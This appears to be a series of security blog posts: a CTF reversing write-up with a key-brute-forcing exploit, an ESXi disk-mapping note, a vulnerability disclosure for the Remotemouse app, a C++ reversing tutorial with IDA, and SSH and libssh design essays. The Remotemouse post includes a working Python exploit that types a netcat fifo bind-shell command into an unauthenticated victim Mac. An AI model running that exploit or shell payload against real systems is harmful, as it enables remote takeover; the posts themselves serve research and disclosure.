This gave me the return addresses of many libc functions, and I was able to rename the PLT entries according to them. From that moment, reversing the binary was a piece of cake, except for the many anti-debugger patterns found in the code. I only removed the patterns at the places where they made local variable resolution hard for IDA and where it was important to me. Go ahead, 0x90 all that crap!

[image: img2]

Now I wanted to understand how the binary worked and what really happened with the multithreading. Details aside, there's only one lock and its only purpose is to avoid fork(). Then I found a very interesting snippet: in the function compare_input_3 (which was, as you're going to see, something else), we can see that the data we give it goes through many loops. The most interesting thing is that a local buffer of 256 bytes is initialized with the values 00, 01, 02, 03, … If you are familiar with cryptography, you'd recognize the first step of an RC4 key setup. The key is set in another function and is statically stored at 0x4023ae: “90 3F 8E 7F 8A”. Let's give it a try:

[image: img3]

>>> rc4.WikipediaARC4("903F8E7F8A".decode("hex")).crypt("\x00"*256).encode("hex")
'8fd94d70a9ce04bb7ba97fdd632d238e52bcdc0bab8bd9f0f7055e6084e76347fec2ce9910c7aaccac65b2c8f8c36
ee0d9cdaaa3f657173152a6580b468f91e91120c1384ec4210c564c7732e6bf80bbd35ccc9cd8fc1d9e44a425a85fc
bfa96f746c0582b135bce5ca5a40be48eecdee6310fe7f10a3d775abf26c0b7610ed841ecd3d6aa691f8689981e43c
c6b95822e3f632747aef16f5c1b25c611db3fa7e9348f96e1d9665963b3e01eb7e367986f413e6fe12dead33718542
32caac84f2f4c37448f9aa300fee983cbf4b6adb7405f5bf5cf9bc60ef3c2f550b2ad5fbe7275a2fadac0c627d490e
7c54389f4479726b835cd6c4503bc1d8706337a05aa'
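For reference, the giveaway is the identity-permutation initialisation of RC4's key scheduling; textbook RC4 (which is what the WikipediaARC4 call above computes) looks like this and reproduces the same keystream:

def rc4_keystream(key, n):
    """Textbook RC4: key scheduling (KSA) then keystream generation (PRGA)."""
    S = list(range(256))                 # the 00 01 02 03 ... buffer seen in the binary
    j = 0
    for i in range(256):                 # KSA
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    i = j = 0
    out = bytearray()
    for _ in range(n):                   # PRGA
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) % 256])
    return bytes(out)

print(rc4_keystream(bytes.fromhex("903F8E7F8A"), 16).hex())   # 8fd94d70a9ce04bb...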

So everything you send is going to be XOR’ed with this value. Now, let’s see what’s happening with that data when it’s decrypted:
[image: img4]
We can see that for every byte that is received, something like this happens:

input[0] + input[0] == 0x9c
input[1] << 2 == 0x10
input[2] << 3 == 0x40
input[3] << 4 == 0xa0
value =  atoi (&input[4])
input[6] << 3 == 0xd0
read_license (value, &input[7]);

I noticed the license key was encrypted, and also that read_license was doing operations with malloc/free. I thought there was a cheap opportunity to avoid using the debugger and to instrument one of the functions myself:

$ cat intercept.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int (*fct)(int, char *);
char buffer[256];
char buffer2[256];
int socket(){
	fct = (void *)0x401cf2;
	fct(1,"Hello");
	write(1,buffer,256);
	write(1,buffer2,256);
	exit(0);
} 
int free(char *ptr){
	if(ptr == 0)
		return;
	printf("free %s\n",ptr);
	write(1,ptr,256);
}
char *malloc(int s){
	printf("Malloc\n");
	static int a = 0;
	if (a)
		return buffer2;
	++a;
	return buffer;
}

aris@kali64:~/ndh2013$ LD_PRELOAD=./intercept.so ./k1986
Malloc
Malloc
$*O~I*IpH..xL}J+{,+O)-|N/MysFtN}/*+M}H.L}Eu/IyIxL-,.rDsDNwNtFuMx{I~HxH})L~NwO,}|E'C%{K|vGp
JzBq Fut'Dt%yMzIqEq&'us+'+xN{H,$vN+"!CrK{H.'.O*|vFsIqr#wwCvsFO~)K)J/(MtuDN|LvE}H~xH+
I+&$wFwDvCz(JrA%,!+)$64:e17cc98f772d417a3ce261df512c2ab4
52:3f45067f05fb180b8f0014a23648d677
99:2385ba276005a5e2098c0acb9bdf8f07
17:083d5f3bcd7c0b39e473844f1326decf
46:840c653d087e8e1821b1903f0981ae2d
05:8efc22fcc45fc5901f1bbce521f29bc1
20:3856bd0cbb94460c113259b0b83d9049

I found an easy way to dump the content of the key file. The two digits on the left must be the value parsed by atoi, and the string on the right must be the expected value. A few attempts show that the server will tell you whether your encrypted input matches the beginning of the token from the list. The exploit follows (also on pastebin with a better presentation).

#!/usr/bin/python
# Exploit for k1984
# Aris Adamantiadis (les pas contents)
# unfortunately coded a few hours after the CTF was over :(
# aris@kali64:~/ndh2013$ python xp.py 
# found 05:8efc22fcc45fc5901f1bbce521f29bc1
# found 06:98adbaaef36e718f479db3b8dad331c9
# found 13:7da8b66f82aeba067e33859583c4153f
# found 17:083d5f3bcd7c0b39e473844f1326decf
# found 20:3856bd0cbb94460c113259b0b83d9049
# found 35:167f0dbb43c6430cd2d3b4e8f79dd769
# found 46:840c653d087e8e1821b1903f0981ae2d
# found 52:3f45067f05fb180b8f0014a23648d677
# found 64:e17cc98f772d417a3ce261df512c2ab4
# found 99:2385ba276005a5e2098c0acb9bdf8f07

import socket

crypted = "8f d9 4d 70 a9 ce 04 bb 7b a9 7f dd 63 2d 23 8e" + \
"52 bc dc 0b ab 8b d9 f0 f7 05 5e 60 84 e7 63 47" + \
"fe c2 ce 99 10 c7 aa cc ac 65 b2 c8 f8 c3 6e e0" + \
"d9 cd aa a3 f6 57 17 31 52 a6 58 0b 46 8f 91 e9" + \
"11 20 c1 38 4e c4 21 0c 56 4c 77 32 e6 bf 80 bb" + \
"d3 5c cc 9c d8 fc 1d 9e 44 a4 25 a8 5f cb fa 96"
crypted = crypted.replace(" ","").decode("hex")
def xor_strings(xs, ys):
    return "".join(chr(ord(x) ^ ord(y)) for x, y in zip(xs, ys))

offset = 65
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM,0)
s.connect(("127.0.0.1",2001))

def try_pass(offset, string):
	payload = chr(0x9C /2) + chr(0x10/4) + chr(0x40/8) + chr(0xa0 / 16) +\
		chr(ord('0') + offset/10) + chr(ord('0') + offset % 10) + chr(0xd0 / 8) +\
		string + "\x00"
	s.send(xor_strings(payload,crypted))
	x = s.recv(256)
	#print "recv:" + x
	if(x.find("True")!= -1):
		return True
	else:
		return False

for offset in xrange(100):
	string = ""
	for i in xrange(32):
		if (i>0 and len(string)==0):
			break;
		for c in xrange(16):
			x = try_pass(offset, string + "%x"%c)
			if x:
				string += "%x"%c
				#print string
				break
	if(len(string) > 0):
		print "found %.2d:"%offset + string

Notes on the debugger: while the write-up makes it look like I did not use a debugger, I extensively used EDB. Its main pro is: “not GDB”. Its main weakness is: “not GDB”. It was unfortunately not very stable and I couldn't save a session or breakpoints for later use. Also, it sometimes confused .text/.data and refused to set my breakpoint because it thought it was in .data.
Well, still better than opening core files in gdb.
What I did that worked well:
- Identify crypto
- Use LD_PRELOAD to extract symbol names and instrument the print_license() functions
- patching the anti-debugging patterns in IDA (even though I could have automated it)
What did not:
- Try for hours to make GDB work
- Not doing a POC in Python from the very beginning. I lost too much time doing xor operations in another window and putting the results back in my shell command
- Trying to patch the binary to make it acceptable for GDB, objdump & friends. I still haven’t found why ld.so can read the file fine and not bfd tools or IDA.
- Discovering edb for the first time that night. I’m sure I underused the capabilities of edb

Adding physical drives to VMware ESXi

I built a new lab environment at home, using VMware ESXi 5.0, which is a very nice product, if we except the Windows-only GUI, a piece of bloatware that needs 1 GB of disk space to install. You can do pretty much anything from there, except something that looks so important that I wonder why it's not in the Windows GUI: mapping local disks to VMs.

I made this little post as a reminder for myself rather than a full tutorial. You can get more info on http://blog.davidwarburton.net/2010/10/25/rdm-mapping-of-local-sata-storage-for-esxi, on which this post is based.

In a nutshell:

  1. log on vmware ESXi as root.
  2. locate the name of your disk in /vmfs/devices/disks/, e.g. “/vmfs/devices/disks/t10.ATA_____Hitachi_HDT725025VLA380_______________________VFL104R6CNYSZW”
  3. go to where you want to copy it. I suggest you create a directory in a datastore for this, like “/vmfs/volumes/datastore1/harddisks/”
  4. vmkfstools -z /vmfs/devices/disks/t10.ATA_____Hitachi_HDT725025VLA380_______________________VFL104R6CNYSZW Hitashi250.vmdk
  5. In your VM, use “attach existing virtual disk” and browse the harddisks directory on datastore.
  6. On Linux, you will need “rescan-scsi-bus” to have your new hard disk detected.
  7. Profit

Remotemouse considered harmful

The problem

This weekend I found a nice application to control my mac from my iPhone. It’s Remotemouse from http://www.remotemouse.net.

Unfortunately, when testing I found out that there was no pairing request nor any authentication… I just fired up Wireshark to see what was happening and, as expected, it's a very dumb cleartext protocol that carries mouse gestures, clicks and keyboard events.

I took my editor and wrote this little script that connects to my Mac, puts the mouse in the upper right corner (over the search lens), clicks it, searches for the Terminal, opens it and launches a bind shell.

Remotemouse binds on all interfaces, IPv4 and IPv6, so if you're using it and allow direct connections from the outside, you are vulnerable.

The code


#!/usr/bin/python
# Remote exploit against remotemouse (www.remotemouse.net)
#
# Launches a remote shell on macosx leopard
#
# Aris Adamantiadis
#
# aris@darkforce:~/synchronized/hack/remotemouse$ python hackmac.py
# enjoy your shell !!
# Connection to 192.168.1.3 31337 port [tcp/*] succeeded!
# sh: no job control in this shell
# aris@aris-laptop:~$ id
# id
# uid=501(aris) gid=20(staff) groups=20(staff),402(com.apple.sharepoint.group.1),
# 401(com.apple.access_screensharing),204(_developer),100(_lpoperator),
# 98(_lpadmin),81(_appserveradm),80(admin),79(_appserverusr),
# 61(localaccounts),12(everyone),501(access_bpf)
# aris@aris-laptop:~$ exit

import time
import socket
import os
right = "mos 6m 9 0"
up = "mos 6m 0 -9"
diag = "mos 6m 9 -9"
fineup = "mos 6m 0 -1"
fineright = "mos 6m 1 0"
key = "key1 "
click = "mos 5R l d" + "mos 5R l u"
host = "192.168.1.3"
shellcode = "while true ; do rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc -l 31337 >/tmp/f ; done&clear;exit"

def keys(v):
	f=""
	for i in v:
		f+= key + i
	return f

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,1978))
s.send(up * 200 + right * 400 + fineup * 9 + fineright *9)
s.close()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
time.sleep(1)
s.connect((host,1978))
s.send(click)
time.sleep(1)
s.send(keys("terminal"))
time.sleep(.5)
s.send("key3 RTN")
time.sleep(.5)
s.send(keys(shellcode))
time.sleep(.5)
s.send("key3 RTN")
time.sleep(.5)
s.close()
print "enjoy your shell !!"
os.system("nc -v " + host + " 31337")

Reversing C++ programs with IDA pro and Hex-rays

Introduction

During my holidays, I had plenty of time to study and reverse a program, which was completely coded in C++. This was the first time I seriously studied a C++ codebase, using IDA as the only source of information, and found it quite hard.

Here’s a sample of what you get with Hex-rays when you start up digging into an interesting function:

v81 = 9;
v63 = *(_DWORD *)(v62 + 88);
if ( v63 )
{
   v64 = *(int (__cdecl **)(_DWORD, _DWORD, _DWORD,
   _DWORD, _DWORD))(v63 + 24);
   if ( v64 )
     v62 = v64(v62, v1, *(_DWORD *)(v3 + 16), *(_DWORD
     *)(v3 + 40), bstrString);
}

It's our job to add symbol names, identify classes and set up all the information to help Hex-Rays give us a reliable and understandable output:

padding = *Dst;
if ( padding < 4 )
  return -1;
buffer_skip_bytes(this2->decrypted_input_buffer, 5u);
buffer_skip_end(this2->decrypted_input_buffer, padding);
if ( this2->encrypt_in != null )
{
  if ( this2->compression_in != null )
  {
    buffer_reinit(this2->compression_buffer_in);
    packet_decompress(this2,
      this2->decrypted_input_buffer,
      this2->compression_buffer_in);
    buffer_reinit(this2->decrypted_input_buffer);
    avail_len = buffer_avail_bytes(this2->compression_buffer_in);
    ptr = buffer_get_data_ptr(this2->compression_buffer_in);
    buffer_add_data_and_alloc(this2->decrypted_input_buffer, ptr, avail_len);
  }
}
packet_type = buffer_get_u8(this2->decrypted_input_buffer);
*len = buffer_avail_bytes(this2->decrypted_input_buffer);
this2->packet_len = 0;
return packet_type;

Of course, Hex-rays is not going to invent the names for you, you’ll still have to make sense of the code and what it means to you, but at least, being able to give a name to the classes will certainly help.

All my samples here have been compiled either with Visual Studio or GNU C++. I have found the results to be similar, even if they may not be compatible. Adapt them for your compiler of interest.

Structure of a C++ program

It is not my goal to teach you how OOP works, you already know that. We'll just see how it works (and is implemented) in broad strokes.

Class = data structure + code (methods).

The data structure can only be seen in the source code, when the methods will appear in your favorite disassembler.

Object = memory allocation + data + virtual functions.

The object is an instantiation of a class, and something you can observe in IDA.  An object needs memory, so you will see a call to new() (or a stack allocation), a call to a constructor and a destructor. You will see accesses to its member variables (embedded objects) and maybe calls to virtual functions.

Virtual functions are silly: it is hard to know, without running the program with breakpoints, what code is going to be executed at runtime (and disassemble it).

Member variables are a bit easier: they work like their counterpart in C (structs), and IDA has a very handy tool to declare structures, and hex-rays handles them very well in the disassembly. Let’s go back to the bits and bytes.

Object creation

int __cdecl sub_80486E4()
{
  void *v0; // ebx@1
  v0 = (void *)operator new(8);
  sub_8048846(v0);
  (**(void (__cdecl ***)(void *))v0)(v0);
  if ( v0 )
    (*(void (__cdecl **)(void *))(*(_DWORD *)v0 + 8))(v0);
  return 0;
}

Here’s the decompilation of a small test program I compiled with G++. We can see the new(8), which means our object is 8 bytes long, even if that doesn’t mean we have 8 bytes of variables.

The function sub_8048846 called just after the new() takes the pointer as parameter, and certainly is the constructor.

The next function call is a little cryptic. It's doing two pointer dereferences on v0 before calling it. It's a virtual function call.

All polymorphic objects have a special pointer among their variables, called the vtable. This table contains the addresses of all the virtual methods, so the C++ program can call them when needed. In the compilers I could test, this vtable is always the first element of an object, and always stays at the same place, even in subclasses. (This may not stay true for multiple inheritance; I did not test.)

Let’s do some IDA magic:

Rename the symbols

Just click on a name, press « n » and give it a meaningful name. Since we don't know yet what our class does, I suggest we name the class « class1 », and use this convention until we've understood what it does. It's very possible that we're going to discover other classes before we've finished digging into class1, so I suggest we simply continue naming classes as we find them.

int __cdecl main()
{
  void *v0; // ebx@1
  v0 = (void *)operator new(8);
  class1::ctor(v0);
  (**(void (__cdecl ***)(void *))v0)(v0);
  if ( v0 )
    (*(void (__cdecl **)(void *))(*(_DWORD *)v0 + 8))(v0);
  return 0;
}

Create structures

The « structures » window of IDA is very useful. Type Shift-F9 to make it appear. I suggest you pull it off (in the QT IDA version) and put it on the right of the IDA window, so you can see both the decompile window and the structures.

Press « ins » and create a new structure « class1 ». Since we know that this structure is 8 bytes long, add fields (using key « d ») until we have two « dd » fields. Rename the first to vtable, since yes, that’s what we got here !

Now, we’re going to add typing information in our function. Right-click on v0, « Convert to struct * », select « class1 ». Alternatively, pressing « y » and typing in « class1 * » will give you the same result.

Create a new structure of 12 bytes and call it « class1_vtable ». At this stage, we cannot really know how big that vtable is, but changing the structure size is very easy. Click on « vtable » in class1's declaration, and type « y ». Now declare it as a « class1_vtable * » object. Refresh the pseudocode view, and watch the magic.

We can rename the few methods to « method1 » to « method3 ». Method3 is certainly the destructor. Depending on the programming convention and the compiler used, the first method often is the destructor, but here’s a counterexample. It is time to analyze the constructor.

Analysis of the constructor

int __cdecl class1::ctor(void *a1)
{
  sub_80487B8(a1);
  *(_DWORD *)a1 = &off_8048A38;
  return puts("B::B()");
}

You can start by setting the typing information we already know on « a1 ». The puts() call confirms our thoughts that we are in a constructor, but here we even learn the name of the class.

« sub_80487B8() » is called directly in the constructor. This can be a static method of class1, but it can also be a constructor of a parent-class.

« off_8048A38 » is the vtable of class1. By looking there, you will be able to find out how big our vtable is (just watch for the next pointer that has an Xref), and get a list of the virtual methods of « class1 ». You can rename them to « class1_mXX », but beware that some of these methods may be shared with other classes.

It is possible to set typing information on the vtable itself (click on it, « y », « class1_vtable »), but I do not recommend it since you lose the classic view in IDA, and it doesn’t provide anything you can’t see in the classic view.

The strange call in the constructor

int __cdecl sub_80487B8(int a1)
{
  int result; // eax@1
  *(_DWORD *)a1 = &off_8048A50;
  puts("A::A()");
  result = a1;
  *(_DWORD *)(a1 + 4) = 42;
  return result;
}

The call to the « sub_80487b8() » function in the constructor reveals the same type of function: a virtual function table pointer is put in the vtable member, and a puts() tells us we're in yet another constructor.

Don't set the type « class1 » on argument « a1 », since we're not dealing with class1. We found a new class, which we will call « class2 ». This class is a superclass of class1. Let's do the same work as for class1. The only difference is that we do not know exactly the size of its members. There are two ways of figuring it out:

  • Look at the xrefs of class2 ::ctor. If we find a straight call to it after a new (i.e. an instantiation), we know the size of its members.
  • Look at the methods in the vtable, and try to guess what’s the highest member ever accessed.

In our case, « class2::ctor » accesses the 4 bytes after the first 4 and sets them to 42. Since its child class « class1 » is 8 bytes long, so is « class2 ».

Do the same procedure with all the subclasses, and give names to the virtual functions, starting from the parent classes to the children.

Study of the destructors

Let’s go back to our main function. We can see that the last call, before our v0 object becomes a memory leak, is a call to the third virtual method of class2. Let’s study it.

if ( v0 )
  ((void (__cdecl *)(class1 *))
    v0->vtable->method_3)(v0);
…
void __cdecl class1::m3(class1 *a1)
{
  class1::m2(a1);
  operator delete(a1);
}
…
void __cdecl class1::m2(class1 *a1)
{
  a1->vtable = (class1_vtable *)&class1__vtable;
  puts("B::~B()");
  class2::m2((class2 *)a1);
}
…
void __cdecl class2::m2(class2 *a1)
{
  a1->vtable = (class2_vtable *)&class2__vtable;
  puts("A::~A()");
}

What we can see here is the following: class1::m3 is a destructor, which calls class1::m2, the main destructor of class1. What this destructor does is ensure that we're well within the « class1 » context, by setting the vtable back to its « class1 » state. It then calls the destructor of « class2 », which also sets the vtable to the « class2 » context. This method can also be used to walk through the whole class hierarchy, since the virtual destructors must always be called for all the classes along the way.

Hey, what are all these casts? Why do I have two structures defining the same fields?

What we have here is exactly the same problem that you get when doing OOP with C : You end up with several fields declared in all the subclasses. Here is what I do to avoid redefinition of fields:

  • For each class, define a classXX_members, classXX_vtable and classXX structure.
  • classXX contains
    • +++ vtable (typed to classXX_vtable *)
    • +++ classXX-1_members (members of the superclass)
    • +++ classXX_members, if any
  • classXX_vtable contains
    • +++ classXX-1_vtable
    • +++ classXX's vptrs, if any

 

Ideally, you should start from the parent class and work down to the children, until you end up in a leaf class. In our example, here's the « solution » of our sample:

 

00000000 class1          struc ; (sizeof=0x8)
00000000 vtable          dd ?                    ; offset
00000004 class2_members  class2_members ?
00000008 class1          ends
00000008
00000000 ; ----------------------------------------------00000000
00000000 class1_members  struc ; (sizeof=0x0)
00000000 class1_members  ends
00000000
00000000 ; ----------------------------------------------00000000
00000000 class1_vtable   struc ; (sizeof=0xC)
00000000 class2_vtable   class2_vtable ?
0000000C class1_vtable   ends
0000000C
00000000 ; ----------------------------------------------00000000
00000000 class2          struc ; (sizeof=0x8)
00000000 vtable          dd ?                    ; offset
00000004 members         class2_members ?
00000008 class2          ends
00000008
00000000 ; ----------------------------------------------00000000
00000000 class2_vtable   struc ; (sizeof=0xC)
00000000 method_1        dd ?                    ; offset
00000004 dtor            dd ?                    ; offset
00000008 delete          dd ?                    ; offset
0000000C class2_vtable   ends
0000000C
00000000 ; ----------------------------------------------00000000
00000000 class2_members  struc ; (sizeof=0x4)
00000000 field_0         dd ?
00000004 class2_members  ends
00000004
int __cdecl main()
{
  class1 *v0; // ebx@1
  v0 = (class1 *)operator new(8);
  class1::ctor(v0);
  ((void (__cdecl *)(class1 *)) v0->vtable->class2_vtable.method_1)(v0);
  if ( v0 )
    ((void (__cdecl *)(class1 *)) v0->vtable->class2_vtable.delete)(v0);
  return 0;
}
int __cdecl class1::ctor(class1 *a1)
{
  class2::ctor((class2 *)a1);
  a1->vtable = (class1_vtable *)&class1__vtable;
  return puts("B::B()");
}
class2 *__cdecl class2::ctor(class2 *a1)
{
  class2 *result; // eax@1
  a1->vtable = (class2_vtable *)&class2__vtable;
  puts("A::A()");
  result = a1;
  a1->members.field_0 = 42;
  return result;
}

In brief

  • When you find a new class, give a symbolic name, and resolve the whole tree before figuring out what should be its real name
  • Start from the ancestor and work your way down to the children
  • Look at the constructors and destructors first, check out the references to new() and static methods.
  • Often, the methods of the same class are located close to each other in the compiled file. Related classes (inheritance) may be far away from each other. Sometimes the constructors are inlined in child-class constructors, or even at the place of the instantiation.
  • If you want to spare time when reversing huge inherited structures, use the struct inclusion trick to name variable only once.
  • Use and abuse Hex-rays’ typing system, it’s very powerful.
  • Pure virtual classes are hell : you can find several classes having similar vtables, but no code in common. Beware of them.

Sources

Try this at home !
The binary (elf32 stripped)

The source file. Don’t open it too fast !
 

SSH[12] protocol weakness ?

A weakness ?

While reading the recent posts around the allegations of a so-called backdoor in the OpenBSD IPSec code, which would have been inserted by the FBI through a developer, I noticed some comments posted on both Slashdot and LWN about “long-standing bugs in SSH2”. The page which details the criticism can be found here. These comments were made by Bernard Perrot when he was patching OpenSSH to comply with the (dumb) restrictions on the use of cryptography imposed by French law.

“I often like to point out an incomprehensible weakness of the protocol concerning the “padding” (known as covered channel): in both version 1 and 2 the packets, have a length which is a multiple of 64 bits, and are padded with a random number. This is quite unusual and therefore sparing a classical fault that is well known in encrypting products: a “hidden” (or “subliminal”) channel. Usually , we “pad” with a verified sequence as for example, give the value n for the byte rank n (self describing padding). In SSH, the sequence being (by definition) randomized, it cannot be checked. Consequently, it is possible that one of the parties communicating could pervert / compromise the communication for example used by a third party who is listening. One can also imagine a corrupted implementation unknown by the two parties (easy to realize on a product provided with only binaries as generally are commercial products). This can easily be done and in this case one only needs to “infect” the client or the server. To leave such an incredible fault in the protocol, even though it is universally known that the installation of a covered channel in an encryption product is THE classic and basic way to corrupt the communication, seems unbelievable to me . It can be interesting to read Bruce Schneier’s remarks concerning the implementation of such elements in products influenced by government agencies. (http://www.counterpane.com/crypto-gram-9902.html#backdoors).”

The author says that SSH1 and SSH2 are vulnerable to covert-channel attack.

Covert-channel attacks

A covert-channel attack is an attack in which an attacker uses a protocol to embed data inside it, with the objective of evading intrusion detection systems, antivirus software, etc., simply to avoid getting caught. Covert channels exist in almost every protocol, at all layers. Hackers used to embed covert root shells inside ICMP ping datagrams, UDP, HTTP, HTML comments, …

Basically, any protocol that allows two different ways of communicating the same information is vulnerable (and most protocols have plenty of ways to present the same data in different forms).

A covert-channel attack is possible on SSH2 by at least two means, as described in the referenced paper:

  • The padding field is said to contain purely random bytes. Its goal is to pad the packet so that the whole packet is a multiple of the block size (the block size being the amount of cleartext encrypted or decrypted on each call to the cryptographic routine). It has no cryptographic intent and its content is never checked, but it is encrypted and covered by the HMAC (an HMAC primitive is a fast, symmetric tool to verify the integrity of data).
    In order to act as a covert channel, this field has to be filled in by either the SSH server or the SSH client, because it is encrypted. Any attempt to change it in transit will be detected because the HMAC won’t match. A sketch of such a packet follows this list.
  • There are specific packet types (SSH_MSG_IGNORE and SSH_MSG_DEBUG) which implementations should accept but discard immediately. Of course, these packets are the best place to insert any data you’d like to send over the encrypted session, but in this case you still need a corrupted server and client.
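
To make the padding channel concrete, here is a hedged sketch of how an SSH2 binary packet (RFC 4253, section 6) is laid out before encryption, with the would-be random padding replaced by bytes chosen by a corrupted endpoint. build_packet() and its arguments are hypothetical illustrations, not libssh or OpenSSH code:

#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hedged sketch of an SSH2 binary packet (RFC 4253, section 6) built with
 * endpoint-chosen padding.  build_packet() and "covert" are hypothetical. */
static size_t build_packet(const uint8_t *payload, size_t payload_len,
                           const uint8_t *covert, size_t covert_len,
                           uint8_t *out, size_t blocksize)
{
    /* padding_length must be >= 4, and (length field + padding_length +
     * payload + padding) must be a multiple of the cipher block size */
    size_t min_len = 4 + 1 + payload_len + 4;
    size_t total   = ((min_len + blocksize - 1) / blocksize) * blocksize;
    size_t padlen  = total - (4 + 1 + payload_len);
    uint32_t packet_length = (uint32_t)(1 + payload_len + padlen);

    out[0] = (uint8_t)(packet_length >> 24);
    out[1] = (uint8_t)(packet_length >> 16);
    out[2] = (uint8_t)(packet_length >> 8);
    out[3] = (uint8_t)packet_length;
    out[4] = (uint8_t)padlen;
    memcpy(out + 5, payload, payload_len);

    /* The padding SHOULD be random; a corrupted endpoint can put anything
     * here, and the receiver never checks these bytes. */
    memset(out + 5 + payload_len, 0, padlen);
    if (covert_len > padlen)
        covert_len = padlen;
    memcpy(out + 5 + payload_len, covert, covert_len);

    /* The whole buffer is then encrypted and MACed, so only the endpoints
     * ever get to see the padding bytes. */
    return total;
}

int main(void)
{
    uint8_t pkt[256];
    const uint8_t payload[] = { 2, 0, 0, 0, 0 };   /* an SSH_MSG_IGNORE    */
    size_t n = build_packet(payload, sizeof(payload),
                            (const uint8_t *)"hidden", 6, pkt, 16);
    printf("%zu byte packet, %u bytes of padding\n", n, (unsigned)pkt[4]);
    return 0;
}

With a 5-byte payload and a 16-byte block size this yields 6 padding bytes, just enough to smuggle the string “hidden” past anyone who can only see the encrypted stream.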

My point here is that these covert channels do exist, but there’s nothing you can do about them at all. The whole idea of an encrypted session is to ensure confidentiality end to end. That confidentiality means that you’re free to send any data you want, and nobody will know about it. That’s also the point of the SSH RFC, section 9.3.6, page 20: the protocol was not designed to prevent covert channels.

Conclusion

My conclusion is simple: it’s not a bug, it’s a feature. Call me when it’s possible to insert data into an encrypted SSH data stream without knowledge of the session key. To the best of my knowledge, there is no way to insert data into a stream without altering the integrity of a packet and thus being detected by either of the parties.

If the parties are compromised, there’s no need for a covert channel: one could simply open a channel carrying its own malicious data and nobody would know. I’m also curious to see how one would design a protocol transmitting encrypted, confidential and arbitrary data that is immune to covert-channel attacks when both sides are compromised. If the attacker couldn’t hide data in the protocol, he’d hide it in the transmitted data.

Threading design pattern?

When designing the new libssh architecture, we decided to make it completely callback-based, even internally. This provides nice features, like the possibility to extend libssh without recompiling it, or to implement asynchronous or non-blocking functions more easily. Libssh 0.5 will run as a state machine which listens for packets and then calls callbacks based on the packet type. The handlers evaluate the current state of the session and decide what to do with the packets. Sometimes, the state of the session itself changes as the result of a packet (e.g. when receiving a SSH_AUTH_SUCCESS packet).

A sequence diagram of a synchronous function, such as authentication or a simple channel read, can be schematized as follows:

What’s happening is pretty straightforward. Thread X is waiting for a specific packet x (or more precisely, the internal state change caused by packet x). It calls a function named ProcessInput (this is a simplification) which takes a lock and tries to read packets from the socket. After a packet has been read, the callback for that packet (in this case, x) is called, which updates the internal state of the session.

ProcessInput returns after reading one packet. X verifies that the state has changed to x; otherwise it simply calls ProcessInput again (not on the drawing) until it receives a state change it can process.
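
To fix ideas, here is a minimal, single-threaded sketch of that pattern. The session, packet and state names are hypothetical stand-ins for the simplified ProcessInput described above, not the real libssh API:

#include <pthread.h>
#include <stdio.h>

enum { STATE_NONE, STATE_X, STATE_Y };

struct session {
    pthread_mutex_t lock;
    int state;                           /* updated by packet callbacks     */
};

/* Stand-in for the blocking socket read; returns the next packet's type. */
static int read_packet(struct session *s)
{
    (void)s;
    return STATE_X;                      /* pretend packet x just arrived   */
}

/* Stand-in for the per-packet-type callback: it updates the session state. */
static void dispatch_packet(struct session *s, int packet_type)
{
    s->state = packet_type;
}

/* Read exactly one packet and run its callback, under the session lock. */
static void ProcessInput(struct session *s)
{
    pthread_mutex_lock(&s->lock);
    int packet_type = read_packet(s);    /* may block on the socket         */
    dispatch_packet(s, packet_type);
    pthread_mutex_unlock(&s->lock);
}

/* A synchronous call (e.g. a blocking channel read) waiting for state x.
 * The unlocked state check is a simplification for this sketch. */
static void wait_for_state_x(struct session *s)
{
    while (s->state != STATE_X)
        ProcessInput(s);
    puts("state x reached");
}

int main(void)
{
    struct session s = { PTHREAD_MUTEX_INITIALIZER, STATE_NONE };
    wait_for_state_x(&s);
    return 0;
}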

Then, what’s the problem?

I thought that this design could provide an interesting feature to libssh users. By adding a lock in the ProcessInput function (already on the previous drawing), we could let applications call different libssh functions on the same session, simultaneously, in different threads. Thread X could be doing a blocking ssh_channel_read() on one channel while thread Y could be doing the same on another. A naive implementation of locking would give this result:

This sequence diagram is a simple extension of the previous one. Thread X waits for a packet x, and thread Y waits its turn by using a lock (or semaphore) in ProcessInput(Y). Looks great, except there’s a pitfall. This example does not work if the first packet to show up is not an x packet:

In this example, the x packet never arrives. The ProcessInput called by the X thread receives the y packet and does process it (after all, all threads can manipulate the internal state of the session). The problem is that after ProcessInput has processed the y packet (leaving X unhappy and looping in the hope of receiving the x packet), ProcessInput(Y)’s lock is released and Y goes on to do a packet read, which can block and make the Y thread wait for a while. This is unfortunate because Y was already in the correct state y before calling ReadPacket. Unfortunately, ProcessInput is meant to be generic and doesn’t know anything about the x or y states.

I’m looking for some kind of design pattern, or elegant solution, to this problem, from those who have already solved it before me.

Potential solutions?

I have thought of three solutions:

  • A lock would “remember” it was blocked by another thread, would wait until the lock is free and then return directly to the caller. This way, our Y thread would not run the potentially blocking ReadPacket function in case thread X already did the hard work for it. In the opposite case (our second example), Y would call ProcessInput a second time and catch the y packet sooner or later.
    Unfortunately, I do not see an elegant way of doing this with the common-denominator building blocks of pthread and Win32 threads. It doesn’t look like an elegant solution to me, but it complies with the specification “ProcessInput returns when at least one packet has been read since the call to ProcessInput”.
  • A received-packet counter would be read at the start of the ProcessInput function and stored on the local stack. The counter would be incremented each time a packet is received on the session, and after entering the critical section of ProcessInput, the two values would be compared. If the counter has changed, ProcessInput would return immediately.
    I suspect this scenario is vulnerable to races between the moment the function is called and the moment the counter is read. Nothing tells us that another thread did not just finish reading the y packet before we initialized the local packet counter.
  • The ProcessInput function would take an additional parameter which would help it tell whether the ReadPacket function is still worth calling. This could be a callback invoked just after acquiring the lock. For instance, Y could call ProcessInput with a specific callback function check_y() which checks whether the state has already changed under the action of the y packet. This function could also be called by the Y function itself in its ProcessInput loop, since it is essentially the termination condition of that loop. A sketch of this option follows the list.
    As a drawback, I think this solution adds extra coupling between the ProcessInput function and its potential callers (there are hundreds of them in libssh master) and may add too much complexity.
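
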